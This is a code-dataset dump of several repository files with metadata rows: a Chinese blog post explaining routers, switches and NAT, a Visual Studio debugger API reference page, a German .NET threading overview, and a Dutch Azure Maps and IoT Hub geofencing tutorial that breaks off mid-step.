] | null | null | null | _posts/2017-10-21-Router-Switch.md | WhataNerb/WhataNerb.github.io | 7a75aa35c05b74b6babbd02118033f9434e76d67 | [
"MIT"
] | null | null | null | _posts/2017-10-21-Router-Switch.md | WhataNerb/WhataNerb.github.io | 7a75aa35c05b74b6babbd02118033f9434e76d67 | [
"MIT"
] | null | null | null | ---
layout: post
title: '路由器与交换机的区别与联系'
date: 2017-10-21
categories: 网络
tags: 网络
---
相信有很多人在学习网络的过程中,都会对路由器与交换机的区别与联系感到疑惑不解,因为这两台设备的功能看起来似乎一样。然而,其实路由器与交换机大有不同,下面是我对此的一些理解,希望能够帮助到你!
### **它们在哪里工作?**
根据 OSI模型的网络体系划分,自底向上,**路由器* 工作在第三层(网络层)**,而我们常说的***交换机* 工作在第二层(链路层)**(目前有更加高级的三层交换机,四层交换机,甚至还有七层交换机)

<br>
### **它们怎么工作?**
它们的主要工作如下:
**路由器:寻址,转发(依靠 IP 地址)**
**交换机:过滤,转发(依靠 MAC 地址)**
我们可以看出这两者的主要工作就是转发数据,但是不同之处是,依靠的地址不同,这是一个根本区别!
路由器内有一份**路由表**,里面有它的寻址信息(就像是一张地图),它收到网络层的**数据报**后,会根据路由表和选路算法将数据报转发到下一站(可能是路由器、交换机、目的主机)
交换机内有一张**MAC表**,里面存放着和它相连的所有设备的MAC地址,它会根据收到的**数据帧**的首部信息内的目的MAC地址在自己的表中查找,如果有就转发,如果没有就放弃
我们来看一个网络拓扑图例子:

通过拓扑图我们应该知道:
**每一个路由器与其之下连接的设备,其实构成一个局域网**
交换机工作在路由器之下,就是也就是**交换机工作在局域网内**
交换机用于**局域网内网的数据转发**
路由器用于**连接局域网和外网**
举个例子:
我们每个人相当于主机,路由器相当于快递员,宿管大爷相当于交换机,学校是一个局域网
快递员根据学校地址(IP)把包裹送到学校,再根据公寓号(子网IP)把快递交给这个公寓的宿管大爷,宿管大爷根据你的名字(MAC)交给你
<br>
### **它们两个可不可以少一个?**
交换机在局域网内工作,它根据 MAC 地址转发数据,如果没有了路由器在网络层寻址,那么我们的数据就不能发送到其他网络终端上去了
路由器内集成了交换机的功能,主机与路由器相连也可以实现数据转发,但是不足之处是:
可扩展的接口不如交换机多
交换机通常由硬件加速转发,路由器主要靠软件寻址,速度慢
<br>
### **实际网络数据转发过程**
> 此处参考:微信公众号:码农翻身,作者:刘欣
通过一个实际网络数据转发的过程,我们可以更好的理解路由器与交换机的区别所在
假设你使用电脑访问www.baidu.com
过程大致如下:

你的电脑先在应用层打包一个 HTTP报文,然后在传输层在打包成 TCP报文,然后再根据 DNS 查到的 IP 在网络层打包成 IP数据报,然后在通过链路层打包成以太网数据帧,发送给你的交换机:

你的交换机收到后,重新包装数据帧,再发送给你的路由器:

你的路由器利用 NAT(Network Address Translation),将你的主机IP(局域网IP)转换为外网IP,还会修改端口号,对外完全隐藏你的主机,再根据路由表选择一条合适的路径进行转发:
*(这里感谢@yc2503的指正)*

在接下来的过程中,每个节点都只改变 MAC 地址,然后在网络中一路向着目的地发送
### 关于NAT:
NAT是一种网络隐蔽技术,它通过建立IP地址映射来隐藏内部的网络
它的主要功能有:
- 提高内部网络的安全性
- 共享网络地址,减少地址消耗
NAT主要有三种实现方式:
- 静态NAT(Basic NAT):最基本的网络转换实现,只转换IP地址,建立IP地址的一对一映射,不支持端口转换
- 网络地址端口转换(NAPT):这种方式支持端口的映射,并允许多台主机共享一个公网IP地址
- 端口多路复用(Port address Translation,PAT):是指改变外出数据包的源端口并进行端口转换,即端口地址转换.采用端口多路复用方式。
> 1.[百度百科](https://baike.baidu.com/item/nat/320024)
> 2.[维基百科](https://zh.wikipedia.org/wiki/%E7%BD%91%E7%BB%9C%E5%9C%B0%E5%9D%80%E8%BD%AC%E6%8D%A2)
| 36.5 | 207 | 0.812785 | yue_Hant | 0.458543 |
9a5cbf993cf6c02cfbceaae273d03be71156f7fb | 876 | md | Markdown | docs/extensibility/debugger/reference/idebugfield-equal.md | Dragollla16/visualstudio-docs | 53fc727cc744ddd3f4baeb36085deac7d8db7b94 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/extensibility/debugger/reference/idebugfield-equal.md | Dragollla16/visualstudio-docs | 53fc727cc744ddd3f4baeb36085deac7d8db7b94 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/extensibility/debugger/reference/idebugfield-equal.md | Dragollla16/visualstudio-docs | 53fc727cc744ddd3f4baeb36085deac7d8db7b94 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: "IDebugField::Equal | Microsoft Docs"
ms.date: "11/04/2016"
ms.topic: "conceptual"
f1_keywords:
- "IDebugField::Equal"
helpviewer_keywords:
- "IDebugField::Equal method"
ms.assetid: 75369fe6-ddd3-497d-80d1-2488e6100e9f
author: "gregvanl"
ms.author: "gregvanl"
manager: jillfra
ms.workload:
- "vssdk"
---
# IDebugField::Equal
This method compares this field with the specified field for equality.
## Syntax
```cpp
HRESULT Equal(
IDebugField* pField
);
```
```csharp
int Equal(
IDebugField pField
);
```
#### Parameters
`pField`
[in] The field to compare to this one.
## Return Value
If the fields are the same, returns `S_OK`. If the fields are different, returns `S_FALSE.` Otherwise, returns an error code.
## See Also
[IDebugField](../../../extensibility/debugger/reference/idebugfield.md) | 21.365854 | 128 | 0.672374 | eng_Latn | 0.621283 |
9a5d42a390b2acb227d06ef9ac73eb0f813dbcfb | 4,010 | md | Markdown | docs/standard/threading/threading-objects-and-features.md | CodeTherapist/docs.de-de | 45ed8badf2e25fb9abdf28c20e421f8da4094dd1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/standard/threading/threading-objects-and-features.md | CodeTherapist/docs.de-de | 45ed8badf2e25fb9abdf28c20e421f8da4094dd1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/standard/threading/threading-objects-and-features.md | CodeTherapist/docs.de-de | 45ed8badf2e25fb9abdf28c20e421f8da4094dd1 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Threadingobjekte und -funktionen
ms.date: 10/01/2018
ms.technology: dotnet-standard
helpviewer_keywords:
- threading [.NET Framework], features
- managed threading
ms.assetid: 239b2e8d-581b-4ca3-992b-0e8525b9321c
author: rpetrusha
ms.author: ronpet
ms.openlocfilehash: 1ba47ece16c74555b58780733e14de9833718c33
ms.sourcegitcommit: 8c28ab17c26bf08abbd004cc37651985c68841b8
ms.translationtype: HT
ms.contentlocale: de-DE
ms.lasthandoff: 10/08/2018
ms.locfileid: "48873306"
---
# <a name="threading-objects-and-features"></a>Threadingobjekte und -funktionen
Zusammen mit der <xref:System.Threading.Thread?displayProperty=nameWithType>-Klasse stellt .NET eine Reihe von Klassen bereit, mit denen Sie Multithread-Anwendungen entwickeln können. In den folgenden Artikeln finden Sie eine Übersicht über diese Klassen:
|Titel|Beschreibung |
|-----------|-----------------|
|[Der verwaltete Threadpool](the-managed-thread-pool.md)|Beschreibt die <xref:System.Threading.ThreadPool?displayProperty=nameWithType>-Klasse, die einen Pool von Arbeitsthreads bereitstellt, die von .NET verwaltet werden.|
|[Timer](timers.md)|Beschreibt .NET-Timer, die in einer Multithreadumgebung verwendet werden können.|
|[Übersicht über Synchronisierungsprimitiven](overview-of-synchronization-primitives.md)|Beschreibt Typen, die zum Synchronisieren des Zugriffs auf eine freigegebene Ressource oder zum Steuern von Threadinteraktionen verwendet werden können.|
|[EventWaitHandle, AutoResetEvent, CountdownEvent, ManualResetEvent](eventwaithandle-autoresetevent-countdownevent-manualresetevent.md)|Beschreibt verwaltete Event-Wait-Handles, die signalisieren und auf Signale warten und zum Synchronisieren von Threadaktivitäten verwendet werden.|
|[Mutexe](mutexes.md)|Beschreibt <xref:System.Threading.Mutex?displayProperty=nameWithType>, das exklusiven Zugriff auf eine freigegebene Ressource gewährt.|
|[Interlocked-Vorgänge](interlocked-operations.md)|Beschreibt die <xref:System.Threading.Interlocked?displayProperty=nameWithType>-Klasse, die atomare Operationen für Variablen bereitstellt, die von mehreren Threads gemeinsam genutzt werden.|
|[Lese-/Schreibsperren](reader-writer-locks.md)|Beschreibt die <xref:System.Threading.ReaderWriterLockSlim?displayProperty=nameWithType>-Klasse, die Zugriff auf eine freigegebene Ressource für einzelne Writer/mehrere Leser bereitstellt.|
|[Semaphore and SemaphoreSlim (Semaphore und SemaphoreSlim)](semaphore-and-semaphoreslim.md)|Beschreibt die <xref:System.Threading.Semaphore?displayProperty=nameWithType>-Klasse, die die Anzahl von Threads einschränkt, die gleichzeitig auf eine freigegebene Ressource oder einen Pool von Ressourcen zugreifen können.|
|[Barrier](barrier.md)|Beschreibt <xref:System.Threading.Barrier?displayProperty=nameWithType>-Klasse, die das Barrieremuster für die Koordination von Threads in stufenweise durchgeführten Vorgängen implementiert.|
|[SpinLock](spinlock.md)|Beschreibt die <xref:System.Threading.SpinLock?displayProperty=nameWithType>-Struktur, die für bestimmte Low-Level-Sperrszenarios eine einfache Alternative zur <xref:System.Threading.Monitor?displayProperty=nameWithType>-Klasse darstellt.|
|[SpinWait](spinwait.md)|Beschreibt die <xref:System.Threading.SpinWait?displayProperty=nameWithType>-Struktur, die Unterstützung für Spin-basierte Wartevorgänge bereitstellt.|
## <a name="see-also"></a>Siehe auch
- <xref:System.Threading.Monitor?displayProperty=nameWithType>
- <xref:System.Threading.WaitHandle?displayProperty=nameWithType>
- <xref:System.ComponentModel.BackgroundWorker?displayProperty=nameWithType>
- <xref:System.Threading.Tasks.Parallel?displayProperty=nameWithType>
- <xref:System.Threading.Tasks.Task?displayProperty=nameWithType>
- [Verwenden von Threads und Threading](using-threads-and-threading.md)
- [Asynchronous File I/O](../io/asynchronous-file-i-o.md)
- [Parallele Programmierung](../parallel-programming/index.md)
- [Task Parallel Library (TPL)](../parallel-programming/task-parallel-library-tpl.md)
| 85.319149 | 317 | 0.822943 | deu_Latn | 0.908337 |
9a5d8887bb0f45defc79eb39bd3c3b1ac482127a | 52 | md | Markdown | README.md | Hellcats666/Juneauempire2020.gov- | 04e514c6237ee75921a2d2a4c9f2ec9fba215e09 | [
"MIT"
] | null | null | null | README.md | Hellcats666/Juneauempire2020.gov- | 04e514c6237ee75921a2d2a4c9f2ec9fba215e09 | [
"MIT"
] | null | null | null | README.md | Hellcats666/Juneauempire2020.gov- | 04e514c6237ee75921a2d2a4c9f2ec9fba215e09 | [
"MIT"
] | null | null | null | # Juneauempire2020.gov-
Admiral Ronald lyle juneau
| 17.333333 | 27 | 0.807692 | nno_Latn | 0.245064 |
9a5db50b26314d945dc37c71cbd3af67e96e2629 | 22,984 | md | Markdown | articles/azure-maps/tutorial-iot-hub-maps.md | jmartens/azure-docs.nl-nl-1 | a38978ea36c628c203be597133a734cf250f0065 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/azure-maps/tutorial-iot-hub-maps.md | jmartens/azure-docs.nl-nl-1 | a38978ea36c628c203be597133a734cf250f0065 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/azure-maps/tutorial-iot-hub-maps.md | jmartens/azure-docs.nl-nl-1 | a38978ea36c628c203be597133a734cf250f0065 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'Zelfstudie: Ruimtelijke IoT-analyse implementeren | Microsoft Azure Maps'
description: Zelfstudie over het integreren van IoT Hub met API's van de Microsoft Azure Maps-service
author: anastasia-ms
ms.author: v-stharr
ms.date: 09/01/2020
ms.topic: tutorial
ms.service: azure-maps
services: azure-maps
manager: philmea
ms.custom: mvc
ms.openlocfilehash: 6109164d8827a343a550a114acc42db2461f3a2c
ms.sourcegitcommit: 80c1056113a9d65b6db69c06ca79fa531b9e3a00
ms.translationtype: HT
ms.contentlocale: nl-NL
ms.lasthandoff: 12/09/2020
ms.locfileid: "96905346"
---
# <a name="tutorial-implement-iot-spatial-analytics-by-using-azure-maps"></a>Zelfstudie: Ruimtelijke IoT-analyse implementeren met behulp van Azure Maps
In een IoT-scenario is het gebruikelijk om relevante gebeurtenissen die zich in ruimte en tijd voordoen, vast te leggen en bij te houden. Voorbeelden omvatten wagenparkbeheer, assets bijhouden, mobiliteit en Smart City-toepassingen. Deze zelfstudie begeleidt u door een oplossing waarmee het verplaatsen van tweedehandshuurauto's wordt getraceerd, met behulp van de Azure Maps-API's.
In deze zelfstudie gaat u:
> [!div class="checklist"]
> * Een Azure-opslagaccount maken om traceringsgegevens voor auto's te registreren.
> * Een geofence uploaden naar de Azure Maps Data-service (preview) met behulp van de Data Upload-API.
> * Een hub maken in Azure IoT Hub en een apparaat registreren.
> * Een functie maken in Azure Functions, waarbij u bedrijfslogica implementeert op basis van de ruimtelijke analyse van Azure Maps.
> * U abonneren op telemetriegebeurtenissen voor IoT-apparaten vanuit de Azure-functie via Azure Event Grid.
> * De telemetriegebeurtenissen filteren met behulp van berichtroutering van IoT Hub.
## <a name="prerequisites"></a>Vereisten
1. Meld u aan bij [Azure Portal](https://portal.azure.com).
2. [Maak een Azure Maps-account](quick-demo-map-app.md#create-an-azure-maps-account).
3. [Een primaire sleutel voor een abonnement verkrijgen](quick-demo-map-app.md#get-the-primary-key-for-your-account), ook wel bekend als de primaire sleutel of de abonnementssleutel. Zie [Verificatie beheren in Azure Maps](how-to-manage-authentication.md) voor meer informatie.
4. [Maak een resourcegroep.](../azure-resource-manager/management/manage-resource-groups-portal.md#create-resource-groups) In deze zelfstudie noemen we de resourcegroep *ContosoRental*, maar u kunt elke gewenste naam kiezen.
5. Download het [C#-project rentalCarSimulation](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/tree/master/src/rentalCarSimulation).
In deze zelfstudie wordt gebruikgemaakt van de toepassing [Postman](https://www.postman.com/), maar u kunt ook een andere API-ontwikkelomgeving kiezen.
## <a name="use-case-rental-car-tracking"></a>Use-case: huurauto traceren
Stel dat een autoverhuurbedrijf locatiegegevens, reisafstand en actieve status voor de huurauto's van het bedrijf wil registreren. Het bedrijf wil deze informatie ook opslaan telkens wanneer een auto de correcte geautoriseerde geografische regio verlaat.
De huurauto's zijn uitgerust met IoT-apparaten die regelmatig telemetriegegevens naar IoT Hub verzenden. De telemetrie bevat de huidige locatie en geeft aan of de motor van de auto loopt. Het apparaatlocatieschema houdt zich aan het IoT [Plug and Play-schema voor georuimtelijke gegeven](https://github.com/Azure/opendigitaltwins-dtdl/blob/master/DTDL/v1-preview/schemas/geospatial.md). Het schema voor de apparaattelemetrie van de huurauto ziet eruit als de volgende JSON-code:
```JSON
{
"data": {
"properties": {
"Engine": "ON"
},
"systemProperties": {
"iothub-content-type": "application/json",
"iothub-content-encoding": "utf-8",
"iothub-connection-device-id": "ContosoRentalDevice",
"iothub-connection-auth-method": "{\"scope\":\"device\",\"type\":\"sas\",\"issuer\":\"iothub\",\"acceptingIpFilterRule\":null}",
"iothub-connection-auth-generation-id": "636959817064335548",
"iothub-enqueuedtime": "2019-06-18T00:17:20.608Z",
"iothub-message-source": "Telemetry"
},
"body": {
"location": {
"type": "Point",
"coordinates": [ -77.025988698005662, 38.9015330523316 ]
}
}
}
}
```
In deze zelfstudie volgt u maar één voertuig. Nadat de Azure-services zijn ingesteld, moet u het [C#-project rentalCarSimulation](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/tree/master/src/rentalCarSimulation) downloaden om de voertuigsimulator uit te voeren. Het hele proces, van gebeurtenis tot uitvoering van de functie, wordt samengevat in de volgende stappen:
1. Het apparaat in het voertuig verzendt telemetriegegevens naar IoT Hub.
2. Als de motor van de auto loopt, publiceert de hub de telemetriegegevens in Event Grid.
3. Er wordt een Azure-functie geactiveerd vanwege het bijbehorende gebeurtenisabonnement op telemetriegebeurtenissen van het apparaat.
4. Met de functie worden de locatiecoördinaten van het voertuig, de gebeurtenistijd en de apparaat-id geregistreerd. Vervolgens wordt de [Spatial Geofence Get API](/rest/api/maps/spatial/getgeofence) gebruikt om te bepalen of de auto zich buiten de geofence heeft begeven. Als de auto buiten de grenzen van de geofence is geweest, worden de locatiegegevens die zijn ontvangen van de gebeurtenis, met de functie opgeslagen in een blobcontainer. Via de functie wordt ook de [omgekeerde zoekopdracht voor adressen](/rest/api/maps/search/getsearchaddressreverse) uitgevoerd om de locatiecoördinaten om te zetten in een straatnaam; deze wordt vervolgens opgeslagen bij de andere locatiegegevens voor het apparaat.
In het volgende diagram ziet u een overzicht op hoog niveau van het systeem.
:::image type="content" source="./media/tutorial-iot-hub-maps/system-diagram.png" border="false" alt-text="Diagram van systeemoverzicht.":::
In de volgende afbeelding is het geofence-gebied blauw gemarkeerd. De route van de huurauto wordt aangegeven met een groene lijn.
:::image type="content" source="./media/tutorial-iot-hub-maps/geofence-route.png" border="false" alt-text="Afbeelding van geofence-route.":::
## <a name="create-an-azure-storage-account"></a>Een Azure-opslagaccount maken
Om de traceringsgegevens over schendingen van de auto op te slaan, maakt u een [algemeen v2-opslagaccount](../storage/common/storage-account-overview.md#general-purpose-v2-accounts) in de resourcegroep. Als u nog geen resourcegroep hebt gemaakt, volgt u de instructies in [Een resourcegroep maken](../azure-resource-manager/management/manage-resource-groups-portal.md#create-resource-groups). In deze zelfstudie geeft u de resourcegroep de naam *ContosoRental*.
Volg de instructies in [Een opslagaccount maken](../storage/common/storage-account-create.md?tabs=azure-portal) om een opslagaccount te maken. In deze zelfstudie geeft u het opslagaccount de naam *contosorentalstorage*, maar over het algemeen kunt u elke gewenste naam kiezen.
Wanneer u het opslagaccount hebt gemaakt, moet u een container maken om logboekgegevens in op te slaan.
1. Ga naar het zojuist gemaakte opslagaccount. Selecteer de koppeling **Containers** in de sectie **Essentials**.
:::image type="content" source="./media/tutorial-iot-hub-maps/containers.png" alt-text="Schermopname van containers voor blobopslag.":::
2. Selecteer **+ Container** in de linkerbovenhoek. Aan de rechterkant van de browser wordt een deelvenster weergegeven. Geef de container de naam *contoso-rental-logs* en selecteer **Maken**.
:::image type="content" source="./media/tutorial-iot-hub-maps/container-new.png" alt-text="Schermopname van een blobcontainer maken.":::
3. Ga naar het deelvenster **Toegangssleutels** in uw opslagaccount en kopieer de waarden bij **Opslagaccountnaam** en **Sleutel** in de sectie **key1**. U hebt deze beide waarden nodig in de sectie 'Een Azure-functie maken en een Event Grid-abonnement toevoegen'.
:::image type="content" source="./media/tutorial-iot-hub-maps/access-keys.png" alt-text="Schermopname van de naam en sleutel van het opslagaccount kopiëren.":::
## <a name="upload-a-geofence"></a>Een geofence uploaden
Gebruik nu de [Postman-app](https://www.getpostman.com) om [de geofence te uploaden](./geofence-geojson.md) naar Azure Maps. De geofence definieert het toegestane geografische gebied voor het huurvoertuig. U gebruikt de geofence in de Azure-functie om te bepalen of een auto is verplaatst buiten het geofence-gebied.
Volg deze stappen om de geofence te uploaden met behulp van de Azure Maps Data Upload-API:
1. Open de Postman-app en selecteer **Nieuw**. Selecteer **Collection** (Verzameling) in het venster **Create New** (Nieuwe maken). Geef de verzameling een naam en selecteer **Maken**.
2. Selecteer nogmaals **New** (Nieuw) om de aanvraag te maken. Selecteer **Aanvraag** in het venster **Nieuwe maken** en voer een aanvraagnaam in voor de aanvraag. Selecteer de verzameling die u in de vorige stap hebt gemaakt en selecteer **Save** (Opslaan).
3. Selecteer de HTTP-methode **POST** op het tabblad Builder en voer de volgende URL in om de geofence te uploaden naar de Data Upload-API. Vergeet niet om `{subscription-key}` te vervangen door de primaire abonnementssleutel.
```HTTP
https://atlas.microsoft.com/mapData/upload?subscription-key={subscription-key}&api-version=1.0&dataFormat=geojson
```
De waarde `geojson` naast de parameter `dataFormat` in het URL-pad vertegenwoordigt de indeling van de gegevens die worden geüpload.
4. Selecteer **Hoofdtekst** > **onbewerkt** voor de invoerindeling en kies **JSON** in de vervolgkeuzelijst. [Open het JSON-gegevensbestand](https://raw.githubusercontent.com/Azure-Samples/iothub-to-azure-maps-geofencing/master/src/Data/geofence.json?token=AKD25BYJYKDJBJ55PT62N4C5LRNN4) en kopieer het bestand in de sectie met de hoofdtekst. Selecteer **Verzenden**.
5. Selecteer **Verzenden** en wacht totdat de aanvraag is verwerkt. Wanneer de aanvraag is voltooid, gaat u naar het tabblad **Kopteksten** van het antwoord. Kopieer de waarde van de **Location**-sleutel (Locatie), de `status URL`.
```http
https://atlas.microsoft.com/mapData/operations/<operationId>?api-version=1.0
```
6. Maak een **GET** HTTP-aanvraag op de `status URL` om de status van de API-aanroep te controleren. U moet uw primaire abonnementssleutel toevoegen aan de URL voor authenticatie. De **GET**-aanvraag moet lijken op de volgende URL:
```HTTP
https://atlas.microsoft.com/mapData/<operationId>/status?api-version=1.0&subscription-key={subscription-key}
7. When the **GET** HTTP request completes successfully, it returns a `resourceLocation`. The `resourceLocation` contains the unique `udid` for the uploaded content. Copy this `udid` for later use in this tutorial.
```json
{
"status": "Succeeded",
"resourceLocation": "https://atlas.microsoft.com/mapData/metadata/{udid}?api-version=1.0"
}
```
## <a name="create-an-iot-hub"></a>Een IoT-hub maken
IoT Hub maakt veilige en betrouwbare tweerichtingscommunicatie mogelijk tussen een IoT-toepassing en de beheerde apparaten. Voor deze zelfstudie wilt u informatie ontvangen van het apparaat in het voertuig om zo de locatie van de huurauto te bepalen. In deze sectie maakt u een IoT-hub in de resourcegroep *ContosoRental*. Deze hub is verantwoordelijk voor het publiceren van de telemetriegebeurtenissen van het apparaat.
> [!NOTE]
> De mogelijkheid om telemetriegebeurtenissen van apparaten in Event Grid te publiceren, is momenteel in openbare preview. Deze functie is beschikbaar in alle regio's, met uitzondering van de volgende: US - oost, US - west, Europa - west, Azure Government, Azure China 21Vianet en Microsoft Azure Duitsland.
Als u een IoT-hub wilt maken in de resourcegroep *ContosoRental*, volgt u de stappen in [Een IoT-hub maken](https://docs.microsoft.com/azure/iot-hub/quickstart-send-telemetry-dotnet#create-an-iot-hub).
## <a name="register-a-device-in-your-iot-hub"></a>Een apparaat registreren in uw IoT-hub
Apparaten kunnen geen verbinding maken met de IoT-hub, tenzij ze zijn geregistreerd in het IoT Hub-identiteitsregister. Hier maakt u één apparaat met de naam *InVehicleDevice*. Als u het apparaat wilt maken en registreren in uw IoT-hub, volgt u de stappen in [Een nieuw apparaat registreren in de IoT-hub](https://docs.microsoft.com/azure/iot-hub/iot-hub-create-through-portal#register-a-new-device-in-the-iot-hub). Zorg ervoor dat u de primaire verbindingsreeks van het apparaat kopieert. U hebt deze later nodig.
## <a name="create-a-function-and-add-an-event-grid-subscription"></a>Een functie maken en een Event Grid-abonnement toevoegen
Azure Functions is een serverloze rekenservice waarmee u kleine codefragmenten (functies) kunt uitvoeren zonder dat u de rekeninfrastructuur expliciet hoeft in te richten of te beheren. Zie [Azure Functions](https://docs.microsoft.com/azure/azure-functions/functions-overview)voor meer informatie.
Een functie wordt geactiveerd via een bepaalde gebeurtenis. Hier maakt u een functie die wordt geactiveerd met een Event Grid-trigger. Maak de relatie tussen de trigger en de functie door een gebeurtenisabonnement te maken voor de telemetriegebeurtenissen van het IoT Hub-apparaat. Wanneer een telemetriegebeurtenis van het apparaat optreedt, wordt de functie aangeroepen als eindpunt, en ontvangt deze de relevante gegevens voor het apparaat dat u eerder hebt geregistreerd in IoT Hub.
Hier ziet u de [C#-scriptcode die uw functie bevat](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/blob/master/src/Azure%20Function/run.csx).
Stel nu uw Azure-functie in.
1. Selecteer **Een resource maken** in het dashboard van Azure Portal. Typ in het tekstvak: **Functie-app**. Selecteer **Functie-app** > **Maken**.
1. Geef de functie-app een naam op de aanmaakpagina van **Functie-app**. Selecteer onder **Resourcegroep** de optie **ContosoRental** in de vervolgkeuzelijst. Selecteer **.NET Core** als **Runtimestack**. Selecteer onderaan de pagina **Volgende: Hosting>** .
:::image type="content" source="./media/tutorial-iot-hub-maps/rental-app.png" alt-text="Schermopname van een functie-app maken.":::
1. Selecteer voor **Opslagaccount** het opslagaccount dat u hebt gemaakt in [Een Azure-opslagaccount maken](#create-an-azure-storage-account). Selecteer **Controleren + maken**.
1. Bekijk de details van de functie-app en selecteer **Maken**.
1. Wanneer de app is gemaakt, voegt u er een functie aan toe. Ga naar functie app. Selecteer het deelvenster **Functies**. Selecteer **+ Toevoegen** bovenaan de pagina. Het deelvenster met functiesjablonen wordt weergegeven. Schuif omlaag in het deelvenster en selecteer **Azure Event Grid-trigger**.
>[!IMPORTANT]
> De namen van de sjablonen **Azure Event Hub-trigger** en **Azure Event Grid-trigger** lijken op elkaar. Zorg ervoor dat u de sjabloon **Azure Event Grid-trigger** selecteert.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-create.png" alt-text="Schermopname van een functie maken.":::
1. Geef een naam op voor de functie. In deze zelfstudie gebruikt u de naam *GetGeoFunction*, maar over het algemeen kunt u elke gewenste naam gebruiken. Selecteer **Functie maken**.
1. Selecteer in het linkermenu het deelvenster **Code + testen**. Kopieer en plak het [C#-script](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/blob/master/src/Azure%20Function/run.csx) in het codevenster.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-code.png" alt-text="Kopiëren/schermopname van code plakken in het functievenster.":::
1. Vervang de volgende parameters in de C#-code:
* Vervang **SUBSCRIPTION_KEY** door de primaire abonnementssleutel van uw Azure Maps-account.
* Vervang **UDID** door de `udid` van de geofence die u hebt geüpload in [Een geofence uploaden](#upload-a-geofence).
* De functie `CreateBlobAsync` in het script maakt een blob per gebeurtenis in het gegevensopslagaccount. Vervang de **ACCESS_KEY**, **ACCOUNT_NAME** en **STORAGE_CONTAINER_NAME** door de toegangssleutel, accountnaam en gegevensopslagcontainer van je opslagaccount. Deze waarden zijn gegenereerd tijdens het maken van het opslagaccount in [Een Azure-opslagaccount maken](#create-an-azure-storage-account).
1. Selecteer in het linkermenu het deelvenster **Integratie**. Selecteer **Event Grid-trigger** in het diagram. Typ een naam voor de trigger, bijvoorbeeld *eventGridEvent* en selecteer **Event Grid-abonnement maken**.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-integration.png" alt-text="Schermopname van gebeurtenisabonnement toevoegen.":::
1. Vul de abonnementsgegevens in. Geef het gebeurtenisabonnement een naam. Selecteer bij **Gebeurtenisschema** de optie **Gebeurtenisrasterschema**. Selecteer bij **Onderwerptypen** de optie **Azure IoT Hub-accounts**. Selecteer bij **Resourcegroep** de resourcegroep die u hebt gemaakt aan het begin van deze zelfstudie. Selecteer bij **Resource** de IoT-hub die u hebt gemaakt in 'Een Azure IoT-hub maken'. Selecteer bij **Filteren op gebeurtenistype** de optie **Apparaattelemetrie**.
Nadat u deze opties hebt gekozen, ziet u dat **Onderwerptype** is gewijzigd in **IoT Hub**. Voor **Systeemonderwerpnaam** kunt u dezelfde naam gebruiken als voor uw resource. Selecteer ten slotte in de sectie **Eindpuntgegevens** de optie **Een eindpunt selecteren**. Accepteer alle instellingen en selecteer **Selectie bevestigen**.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-create-event-subscription.png" alt-text="Schermopname van gebeurtenisabonnement maken.":::
1. Controleer de instellingen. Zorg ervoor dat het eindpunt de functie opgeeft die u in het begin van deze sectie hebt gemaakt. Selecteer **Maken**.
:::image type="content" source="./media/tutorial-iot-hub-maps/function-create-event-subscription-confirm.png" alt-text="Schermopname van bevestiging voor Gebeurtenisabonnement maken.":::
1. Nu bent u terug bij het paneel **Trigger bewerken**. Selecteer **Opslaan**.
## <a name="filter-events-by-using-iot-hub-message-routing"></a>Gebeurtenissen filteren met behulp van berichtroutering van IoT Hub
Wanneer u een Event Grid-abonnement toevoegt aan de Azure-functie, wordt automatisch een berichtroute gemaakt in de opgegeven IoT-hub. Met berichtroutering kunt u verschillende gegevenstypen naar meerdere eindpunten routeren. Je kunt bijvoorbeeld telemetrieberichten van apparaten, levenscyclusgebeurtenissen van apparaten en dubbele wijzigingen van apparaten routeren. Zie [IoT Hub-berichtroutering gebruiken](https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-messages-d2c) voor meer informatie.
:::image type="content" source="./media/tutorial-iot-hub-maps/hub-route.png" alt-text="Schermopname van berichtroutering in IoT Hub.":::
In het voorbeeldscenario wilt u alleen berichten ontvangen wanneer de huurauto wordt verplaatst. Maak een routeringsquery om de gebeurtenissen te filteren waarbij de eigenschap `Engine` gelijk is aan **ON**. Als u een routeringsquery wilt maken, selecteert u de route **RouteToEventGrid** en vervangt u de **Routing-query** door **"Engine = 'ON'"** . Selecteer vervolgens **Opslaan**. De IoT-hub publiceert nu alleen apparaattelemetrie als de motor is ingeschakeld.
:::image type="content" source="./media/tutorial-iot-hub-maps/hub-filter.png" alt-text="Schermopname van routeringsberichten filteren.":::
>[!TIP]
>Er zijn verschillende manieren om een query uit te voeren op IoT-apparaat-naar-cloud-berichten. Raadpleeg [IoT Hub-berichtroutering gebruiken](https://docs.microsoft.com/azure/iot-hub/iot-hub-devguide-routing-query-syntax) voor meer informatie over syntaxis van berichtroutering.
## <a name="send-telemetry-data-to-iot-hub"></a>Stuur telemetriegegevens naar IoT Hub
Wanneer de Azure-functie actief is, kunt u telemetriegegevens verzenden naar de IoT-hub, vanwaaruit ze naar Event Grid worden gerouteerd. Gebruik een C#-applicatie om locatiegegevens te simuleren voor een in-voertuig apparaat van een huurauto. U hebt .NET Core SDK 2.1.0 of hoger nodig op de ontwikkelcomputer om de toepassing uit te voeren. Volg deze stappen om gesimuleerde telemetriegegevens naar de IoT-hub te verzenden:
1. Als u dit nog niet hebt gedaan, downloadt u het C#-project [rentalCarSimulation](https://github.com/Azure-Samples/iothub-to-azure-maps-geofencing/tree/master/src/rentalCarSimulation).
2. Open het bestand `simulatedCar.cs` in een teksteditor naar keuze en vervang de waarde van de `connectionString` door de waarde die u hebt opgeslagen toen u het apparaat registreerde. Sla de wijzigingen in het bestand op.
